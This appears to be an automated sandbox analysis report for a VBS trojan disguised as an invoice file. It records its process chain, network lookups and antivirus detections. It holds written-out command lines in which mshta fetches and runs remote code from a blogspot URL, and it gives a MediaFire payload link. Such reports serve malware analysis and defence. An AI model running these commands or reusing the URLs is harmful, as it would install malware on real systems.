Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 9, 2023, 11:15 a.m. | Aug. 9, 2023, 11:18 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\lnvoice#20336 .vbs"
3048-
mshta.exe "C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml
2200
-
Name | Response | Post-Analysis Lookup |
---|---|---|
htmmaincpla.blogspot.com | 142.250.76.129 | |
www.mediafire.com | 104.16.53.48 | |
download2357.mediafire.com | 199.91.155.98 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
request | GET https://htmmaincpla.blogspot.com/atom.xml |
request | GET https://www.mediafire.com/file/uobbc8hga4065u7/MAINNODECPa.htm/file |
cmdline | "C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml |
cmdline | mshta https://htmmaincpla.blogspot.com/atom.xml |
ALYac | VB:Trojan.VBS.Agent.BTQ |
VIPRE | VB:Trojan.VBS.Agent.BTQ |
ESET-NOD32 | VBS/Kryptik.TV |
Kaspersky | HEUR:Trojan.Script.Generic |
BitDefender | VB:Trojan.VBS.Agent.BTQ |
MicroWorld-eScan | VB:Trojan.VBS.Agent.BTQ |
Tencent | Script.Trojan.Generic.Ximw |
Emsisoft | VB:Trojan.VBS.Agent.BTQ (B) |
FireEye | VB:Trojan.VBS.Agent.BTQ |
GData | VB:Trojan.VBS.Agent.BTQ |
Arcabit | VB:Trojan.VBS.Agent.BTQ |
ZoneAlarm | HEUR:Trojan.Script.Generic |
MAX | malware (ai score=82) |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml | ||||||
parent_process | wscript.exe | martian_process | mshta https://htmmaincpla.blogspot.com/atom.xml |
file | C:\Windows\System32\mshta.exe |